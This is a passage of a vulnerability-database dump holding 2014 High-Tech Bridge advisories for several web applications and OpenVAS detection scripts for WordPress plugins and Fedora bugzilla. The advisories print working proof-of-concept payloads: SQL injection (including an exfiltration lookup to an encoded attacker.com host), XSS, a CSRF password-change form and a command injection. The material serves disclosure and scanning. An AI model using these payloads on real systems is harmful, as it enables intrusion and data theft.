type=\"hidden\" name=\"category_filter\" value=\"1\"> \n<input type=\"hidden\" name=\"cost_model_filter\" value=\"cpm\"> \n<input type=\"hidden\" name=\"form_mode\" value=\"save\"> \n<input type=\"hidden\" name=\"image_size_filter\" value=\"12\"> \n<input type=\"hidden\" name=\"keyword_filter\" value=\"1\"> \n<input type=\"hidden\" name=\"site_directory_page\" value=\"1\"> \n<input type=\"hidden\" name=\"site_directory_per_page\" value=\"10\"> \n<input type=\"hidden\" name=\"site_directory_sort_direction\" value=\"asc\"> \n<input type=\"hidden\" name=\"site_directory_sort_field\" value=\"(select load_file(CONCAT(CHAR(92), CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107) ,CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102 ),CHAR(111), CHAR(111),CHAR(98),CHAR(97),CHAR(114))))\"> \n<input type=\"submit\" id=\"btn\"> \n</form> \nThe second PoC code works against any platform (UNIX/Windows) and uses blind SQL injection brute-force (dichotomy) technique to extract data from the database: \n<form action=\"http://[host]/guest/site_directory\" method=\"post\" name=\"main\"> \n<input type=\"hidden\" name=\"active_form\" value=\"site_directory_form\"> \n<input type=\"hidden\" name=\"ad_type_filter\" value=\"text\"> \n<input type=\"hidden\" name=\"category_filter\" value=\"1\"> \n<input type=\"hidden\" name=\"cost_model_filter\" value=\"cpm\"> \n<input type=\"hidden\" name=\"form_mode\" value=\"save\"> \n<input type=\"hidden\" name=\"image_size_filter\" value=\"12\"> \n<input type=\"hidden\" name=\"keyword_filter\" value=\"1\"> \n<input type=\"hidden\" name=\"site_directory_page\" value=\"1\"> \n<input type=\"hidden\" name=\"site_directory_per_page\" value=\"10\"> \n<input type=\"hidden\" name=\"site_directory_sort_direction\" value=\"asc\"> \n<input type=\"hidden\" name=\"site_directory_sort_field\" value=\"(SELECT IF(ASCII(SUBSTRING((SELECT USER()),1,1))>=0,1, BENCHMARK(22000000,MD5(NOW()))))\"> \n<input type=\"submit\" id=\"btn\"> \n</form>\n", "reporter": "High-Tech Bridge", "published": "2014-03-19T00:00:00", "type": "htbridge", "title": "SQL Injection in Orbit Open Ad Server", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "Orbit Open Ad Server", "version": "1.1.0", "operator": "le"}], "cvelist": ["CVE-2014-2540"], "_object_type": "robots.models.htbridge.HTBridgeBulletin", "modified": "2014-04-08T00:00:00", "id": "HTB23208", "href": "https://www.htbridge.com/advisory/HTB23208", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P/"}}, {"lastseen": "2017-06-23T23:08:36", "_object_types": ["robots.models.base.Bulletin", "robots.models.htbridge.HTBridgeBulletin"], "references": [], "description": "High-Tech Bridge Security Research Lab discovered multiple SQL injection vulnerabilities in mAdserve, which can be exploited to execute arbitrary SQL commands in application\u2019s database and compromise vulnerable website. \n \n1) SQL Injection in mAdserve: CVE-2014-2654 \n1.1 The vulnerability exists due to insufficient sanitization of user Input passed via the \"id\" HTTP GET parameter to \"/www/cp/edit_ad_unit.php\" script. A remote authenticated attacker can inject and execute arbitrary SQL commands in application\u2019s database and gain complete control over the application. \nThe exploitation example below displays version of MySQL server: \nhttp://[host]/www/cp/edit_ad_unit.php?id=1%27%20UNION%20SELECT%201,2,3,4,5,6 ,7,8,9,10,11,version%28%29,13,14,15,16,17%20--%202 \n \n1.2 Input passed via the \"id\" HTTP GET parameter to \"/www/cp/view_adunits.php\" script is not properly sanitised before being used in a SQL query. A remote authenticated attacker can inject and execute arbitrary SQL commands in application\u2019s database and gain complete control over the application. \nThe exploitation example below displays version of MySQL server: \nhttp://[host]/www/cp/view_adunits.php?id=1%27%20UNION%20SELECT%201,2,3,4,ver sion%28%29,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26%20--%2 02 \n \n1.3 Input passed via the \"id\" HTTP GET parameter to \"/www/cp/edit_campaign.php\" script is not properly sanitised before being used in a SQL query. A remote authenticated attacker can inject and execute arbitrary SQL commands in application\u2019s database and gain complete control over the application. \nThe exploitation example below displays version of MySQL server: \nhttp://[host]/www/cp/edit_campaign.php?id=1%27%20UNION%20SELECT%201,2,3,4,ve rsion%28%29,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26%20--% 202 \n \nSuccessful exploitation of these vulnerabilities requires the attacker to have an account and to be logged in. User accounts are manually created by mAdserve administrator. \n", "reporter": "High-Tech Bridge", "published": "2014-03-26T00:00:00", "type": "htbridge", "title": "SQL Injection in mAdserve", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "mAdserve ", "version": "2.0", "operator": "le"}], "cvelist": ["CVE-2014-2654"], "_object_type": "robots.models.htbridge.HTBridgeBulletin", "modified": "2014-04-16T00:00:00", "id": "HTB23209", "href": "https://www.htbridge.com/advisory/HTB23209", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P/"}}, {"lastseen": "2017-06-23T23:08:28", "_object_types": ["robots.models.base.Bulletin", "robots.models.htbridge.HTBridgeBulletin"], "references": [], "description": "High-Tech Bridge Security Research Lab discovered vulnerability in Open Classifieds, which can be exploited to perform Cross-Site Scripting (XSS) attacks. \n \n1) Cross-Site Scripting (XSS) in Open Classifieds: CVE-2014-2024 \nThe vulnerability exists due to insufficient sanitisation of user-supplied data passed via the URI to \"/shared-apartments-rooms/\" URL. A remote attacker can trick a logged-in user to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website. \nThe exploitation example below uses the JavaScript \"alert()\" function to display \"immuniweb\" word: \nhttp://[host]/shared-apartments-rooms/</title><script>alert(%22immuniweb%22) </script> \n\n", "reporter": "High-Tech Bridge", "published": "2014-02-19T00:00:00", "type": "htbridge", "title": "Cross-Site Scripting (XSS) in Open Classifieds", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "Open Classifieds", "version": "2-2.1.2", "operator": "le"}], "cvelist": ["CVE-2014-2024"], "_object_type": "robots.models.htbridge.HTBridgeBulletin", "modified": "2014-02-20T00:00:00", "id": "HTB23204", "href": "https://www.htbridge.com/advisory/HTB23204", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N/"}}, {"lastseen": "2017-06-23T23:08:34", "_object_types": ["robots.models.base.Bulletin", "robots.models.htbridge.HTBridgeBulletin"], "references": [], "description": "High-Tech Bridge Security Research Lab discovered vulnerability in XCloner Standalone, which can be exploited to perform \u0421ross-Site Request Forgery (CSRF) attacks and gain complete control over the website. \n \n1\\. \u0421ross-Site Request Forgery (CSRF) in XCloner Standalone: CVE-2014-2579 \n1.1 The vulnerability exists due to insufficient validation of HTTP request origin. A remote attacker can trick a logged-in administrator to visit a specially crafted webpage and change administrator\u2019s password. \nThe exploitation example below changes password for user 'login' to 'immuniweb': \n<form action=\"http://[host]/index2.php\" method=\"post\" name=\"main\"> \n<input type=\"hidden\" name=\"jcuser\" value=\"login\"> \n<input type=\"hidden\" name=\"jcpass\" value=\"password\"> \n<input type=\"hidden\" name=\"option\" value=\"com_cloner\"> \n<input type=\"hidden\" name=\"task\" value=\"config\"> \n<input type=\"hidden\" name=\"action\" value=\"save\"> \n<script> \ndocument.main.submit(); \n</script> \n</form> \n1.2 The vulnerability exists due to insufficient validation of HTTP request origin. A remote attacker can trick a logged-in administrator to visit a specially crafted webpage and execute arbitrary system commands on vulnerable system with privileges of the webserver. \nThe exploitation example below uses the 'echo' system command to write 'immuniweb' string into file '/var/www/file.php': \nhttp://[host]/index2.php?option=com_cloner&task=generate&bname=1&dbbackup=1& cron_access=1&dbbackup_comp=||%20echo immuniweb > /var/www/file.php%20|| \nSuccessful exploitation of this vulnerability requires that options 'enable_db_backup' and 'sql_mem' are enabled in application\u2019s configuration file.\n", "reporter": "High-Tech Bridge", "published": "2014-03-14T00:00:00", "type": "htbridge", "title": "\u0421ross-Site Request Forgery (CSRF) in XCloner Standalone", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "XCloner Standalone", "version": "3.5", "operator": "le"}], "cvelist": ["CVE-2014-2579"], "_object_type": "robots.models.htbridge.HTBridgeBulletin", "modified": "2014-03-14T00:00:00", "id": "HTB23207", "href": "https://www.htbridge.com/advisory/HTB23207", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C/"}}, {"lastseen": "2017-09-24T14:46:29", "_object_types": ["robots.models.base.Bulletin", "robots.models.htbridge.HTBridgeBulletin"], "references": [], "description": "High-Tech Bridge Security Research Lab discovered vulnerability in Ilch CMS, which can be exploited to perform Cross-Site Scripting (XSS) attacks against users and administrators of vulnerable application. \n \n1) Cross-Site Scripting (XSS) in Ilch CMS: CVE-2014-1944 \nThe vulnerability exists due to insufficient sanitisation of user-supplied data in \"text\" HTTP POST parameter passed to \"/index.php/guestbook/index/newentry\" URL. A remote unauthenticated user can send a specially crafted HTTP POST request, which allows to permanently inject and execute arbitrary HTML and script code in user\u2019s browser in context of the vulnerable website when the victim visits the \"http://[host]/index.php/guestbook/index/index\" URL. \nThe exploitation example below uses the JavaScript \"alert()\" function to display \"immuniweb\" word: \nPOST /index.php/guestbook/index/newentry HTTP/1.1 \nContent-Type: application/x-www-form-urlencoded \nContent-Length: 151 \nilch_token=5a528778359d4756b9b8803b48fba18b&name=name&email=email%40e mail.com&homepage=http%3A%2F%2Fsite.com&text=<script>alert('immuniwweb');</s cript>&saveEntry=Submit\n", "reporter": "High-Tech Bridge", "published": "2014-02-12T00:00:00", "type": "htbridge", "title": "Cross-Site Scripting (XSS) in Ilch CMS", "enchantments": {"score": {"vector": "NONE", "value": 6.8}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "Ilch CMS", "version": "2.0", "operator": "le"}], "cvelist": ["CVE-2014-1944"], "_object_type": "robots.models.htbridge.HTBridgeBulletin", "modified": "2014-02-12T00:00:00", "id": "HTB23203", "href": "https://www.htbridge.com/advisory/HTB23203", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "openvas": [{"lastseen": "2018-09-17T13:37:39", "references": ["http://packetstormsecurity.com/files/125454", "https://www.htbridge.com/advisory/HTB23199", "http://www.exploit-db.com/exploits/31986"], "pluginID": "1361412562310804530", "description": "This host is installed with Wordpress VideoWhisper Live Streaming Integration\nPlugin and is prone to multiple vulnerabilities.", "edition": 7, "reporter": "Copyright (C) 2014 Greenbone Networks GmbH", "published": "2014-04-01T00:00:00", "title": "WordPress VideoWhisper Live Streaming Integration Multiple Vulnerabilities", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Web application abuses", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-1907", "CVE-2014-1906", "CVE-2014-1905", "CVE-2014-1908"], "modified": "2018-09-15T00:00:00", "id": "OPENVAS:1361412562310804530", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310804530", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_wordpress_videowhisper_mult_vuln.nasl 35802 2014-04-01 12:28:38Z Apr$\n#\n# WordPress VideoWhisper Live Streaming Integration Multiple Vulnerabilities\n#\n# Authors:\n# Thanga Prakash S <tprakash@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\nCPE = \"cpe:/a:wordpress:wordpress\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.804530\");\n script_version(\"$Revision: 11402 $\");\n script_cve_id(\"CVE-2014-1906\", \"CVE-2014-1907\", \"CVE-2014-1905\", \"CVE-2014-1908\");\n script_bugtraq_id(65876, 65877, 65866, 65880);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-15 11:13:36 +0200 (Sat, 15 Sep 2018) $\");\n script_tag(name:\"creation_date\", value:\"2014-04-01 12:28:38 +0530 (Tue, 01 Apr 2014)\");\n script_name(\"WordPress VideoWhisper Live Streaming Integration Multiple Vulnerabilities\");\n\n\n script_tag(name:\"summary\", value:\"This host is installed with Wordpress VideoWhisper Live Streaming Integration\nPlugin and is prone to multiple vulnerabilities.\");\n script_tag(name:\"vuldetect\", value:\"Send a crafted data via HTTP GET request and check whether it is able to read\ncookie or not.\");\n script_tag(name:\"insight\", value:\"Multiple flaws are due to an,\n\n - Improper verification of file extensions before uploading files to the server\n in '/videowhisper-live-streaming-integration/ls/vw_snapshots.php'\n\n - Input passed via HTTP POST parameters 'msg' to /ls/vc_chatlog.php, 'm' to\n /ls/lb_status.php, 'ct' to /ls/lb_status.php and /ls/v_status.php.\n\n - Input passed via HTTP GET parameters 'n' to /ls/channel.php, htmlchat.php,\n ls/video.php, and /videotext.php, 'message' to /ls/lb_logout.php, and 's'\n to rtmp_login.php and rtmp_logout.php scripts.\");\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attacker to execute arbitrary HTML and\nscript code in a user's browser session in the context of an affected site and\nread/delete arbitrary files.\");\n script_tag(name:\"affected\", value:\"WordPress VideoWhisper Live Streaming Integration Plugin version 4.27.3\nand probably prior.\");\n script_tag(name:\"solution\", value:\"Upgrade to version 4.29.5 or later,\nFor updates refer to http://wordpress.org/plugins/videowhisper-live-streaming-integration\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://www.exploit-db.com/exploits/31986\");\n script_xref(name:\"URL\", value:\"https://www.htbridge.com/advisory/HTB23199\");\n script_xref(name:\"URL\", value:\"http://packetstormsecurity.com/files/125454\");\n script_category(ACT_ATTACK);\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"secpod_wordpress_detect_900182.nasl\");\n script_mandatory_keys(\"wordpress/installed\");\n script_require_ports(\"Services/www\", 80);\n exit(0);\n}\n\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"host_details.inc\");\n\nif(!http_port = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(!dir = get_app_location(cpe:CPE, port:http_port)){\n exit(0);\n}\n\nurl = dir + '/wp-content/plugins/videowhisper-live-streaming-integration/ls'+\n '/channel.php?n=</title><script>alert(document.cookie)</script>';\n\nif(http_vuln_check(port:http_port, url:url, check_header:TRUE,\n pattern:\"<script>alert\\(document.cookie\\)</script>\",\n extra_check:'>Video Whisper Live Streaming<'))\n{\n security_message(http_port);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:55:23", "references": ["http://www.exploit-db.com/exploits/31834", "http://secunia.com/advisories/57079", "http://packetstormsecurity.com/files/125330", "https://www.htbridge.com/advisory/HTB23201"], "pluginID": "1361412562310804511", "description": "This host is installed with WordPress AdRotate Plugin and is prone to sql\ninjection vulnerability.", "edition": 5, "reporter": "Copyright (C) 2014 Greenbone Networks GmbH", "published": "2014-03-11T00:00:00", "title": "WordPress AdRotate Plugin 'clicktracker.php' SQL Injection Vulnerability", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Web application abuses", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-1854"], "modified": "2018-08-14T00:00:00", "id": "OPENVAS:1361412562310804511", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310804511", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_wordpress_adrotate_track_pram_sqli_vul.nasl 10952 2018-08-14 10:31:41Z mmartin $\n#\n# WordPress AdRotate Plugin 'clicktracker.php' SQL Injection Vulnerability\n#\n# Authors:\n# Thanga Prakash S <tprakash@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\nCPE = \"cpe:/a:wordpress:wordpress\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.804511\");\n script_version(\"$Revision: 10952 $\");\n script_cve_id(\"CVE-2014-1854\");\n script_bugtraq_id(65709);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-08-14 12:31:41 +0200 (Tue, 14 Aug 2018) $\");\n script_tag(name:\"creation_date\", value:\"2014-03-11 11:17:52 +0530 (Tue, 11 Mar 2014)\");\n script_name(\"WordPress AdRotate Plugin 'clicktracker.php' SQL Injection Vulnerability\");\n\n\n script_tag(name:\"summary\", value:\"This host is installed with WordPress AdRotate Plugin and is prone to sql\ninjection vulnerability.\");\n script_tag(name:\"vuldetect\", value:\"Send a crafted exploit string via HTTP GET request and check whether it is\npossible to execute sql query or not.\");\n script_tag(name:\"insight\", value:\"Flaw is due to the library/clicktracker.php script not properly sanitizing\nuser-supplied input to the 'track' parameter.\");\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attacker to inject or manipulate SQL\nqueries in the back-end database, allowing for the manipulation or disclosure\nof arbitrary data.\");\n script_tag(name:\"affected\", value:\"Wordpress AdRotate Pro plugin version 3.9 through 3.9.5 and AdRotate Free\nplugin version 3.9 through 3.9.4\");\n script_tag(name:\"solution\", value:\"Upgrade AdRotate Pro to version 3.9.6 or higher and AdRotate Free to version\n3.9.5 or higher, For Updates refer to http://www.adrotateplugin.com\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/57079\");\n script_xref(name:\"URL\", value:\"http://www.exploit-db.com/exploits/31834\");\n script_xref(name:\"URL\", value:\"https://www.htbridge.com/advisory/HTB23201\");\n script_xref(name:\"URL\", value:\"http://packetstormsecurity.com/files/125330\");\n script_category(ACT_ATTACK);\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"secpod_wordpress_detect_900182.nasl\");\n script_mandatory_keys(\"wordpress/installed\");\n script_require_ports(\"Services/www\", 80);\n exit(0);\n}\n\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"host_details.inc\");\n\nif(!http_port = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(!dir = get_app_location(cpe:CPE, port:http_port)){\n exit(0);\n}\n\nurl = dir + '/wp-content/plugins/adrotate/library/clicktracker.php?track=LT' +\n 'EgVU5JT04gU0VMRUNUIHZlcnNpb24oKSwxLDEsMQ==';\n\nreq = http_get(item:url, port:http_port);\nres = http_keepalive_send_recv(port:http_port, data:req, bodyonly:FALSE);\n\nif(res && res =~ \"HTTP/1.. 302 Found\" && res =~ \"Location: ([0-9.]+)\")\n{\n security_message(http_port);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:55:02", "references": ["https://lists.fedoraproject.org/pipermail/package-announce/2014-April/132309.html", "2014-5433"], "pluginID": "1361412562310867745", "description": "Check for the Version of bugzilla", "edition": 4, "reporter": "Copyright (C) 2014 Greenbone Networks GmbH", "published": "2014-05-05T00:00:00", "title": "Fedora Update for bugzilla FEDORA-2014-5433", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-1517"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:1361412562310867745", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310867745", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for bugzilla FEDORA-2014-5433\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.867745\");\n script_version(\"$Revision: 9373 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:57:18 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2014-05-05 11:12:48 +0530 (Mon, 05 May 2014)\");\n script_cve_id(\"CVE-2014-1517\");\n script_tag(name:\"cvss_base\", value:\"4.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:N/A:N\");\n script_name(\"Fedora Update for bugzilla FEDORA-2014-5433\");\n\n tag_insight = \"Bugzilla is a popular bug tracking system used by multiple open source projects\nIt requires a database engine installed - either MySQL, PostgreSQL or Oracle.\nWithout one of these database engines (local or remote), Bugzilla will not work\n- see the Release Notes for details.\n\";\n\n tag_affected = \"bugzilla on Fedora 20\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"FEDORA\", value: \"2014-5433\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2014-April/132309.html\");\n script_tag(name:\"summary\", value:\"Check for the Version of bugzilla\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"bugzilla\", rpm:\"bugzilla~4.2.9~1.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-09-01T23:54:53", "references": ["2014-5414", "https://lists.fedoraproject.org/pipermail/package-announce/2014-April/132281.html"], "pluginID": "1361412562310867769", "description": "Check for the Version of bugzilla", "edition": 4, "reporter": "Copyright (C) 2014 Greenbone Networks GmbH", "published": "2014-05-05T00:00:00", "title": "Fedora Update for bugzilla FEDORA-2014-5414", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-1517"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:1361412562310867769", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310867769", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for bugzilla FEDORA-2014-5414\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.867769\");\n script_version(\"$Revision: 9373 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:57:18 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2014-05-05 11:17:13 +0530 (Mon, 05 May 2014)\");\n script_cve_id(\"CVE-2014-1517\");\n script_tag(name:\"cvss_base\", value:\"4.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:N/A:N\");\n script_name(\"Fedora Update for bugzilla FEDORA-2014-5414\");\n\n tag_insight = \"Bugzilla is a popular bug tracking system used by multiple open source projects\nIt requires a database engine installed - either MySQL, PostgreSQL or Oracle.\nWithout one of these database engines (local or remote), Bugzilla will not work\n- see the Release Notes for details.\n\";\n\n tag_affected = \"bugzilla on Fedora 19\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"FEDORA\", value: \"2014-5414\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2014-April/132281.html\");\n script_tag(name:\"summary\", value:\"Check for the Version of bugzilla\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"bugzilla\", rpm:\"bugzilla~4.2.9~1.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-07-25T10:48:20", "references": ["https://lists.fedoraproject.org/pipermail/package-announce/2014-April/132309.html", "2014-5433"], "pluginID": "867745", "description": "Check for the Version of bugzilla", "edition": 2, "reporter": "Copyright (C) 2014 Greenbone Networks GmbH", "published": "2014-05-05T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "title": "Fedora Update for bugzilla FEDORA-2014-5433", "type": "openvas", "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-1517"], "modified": "2017-07-10T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=867745", "id": "OPENVAS:867745", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for bugzilla FEDORA-2014-5433\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_id(867745);\n script_version(\"$Revision: 6629 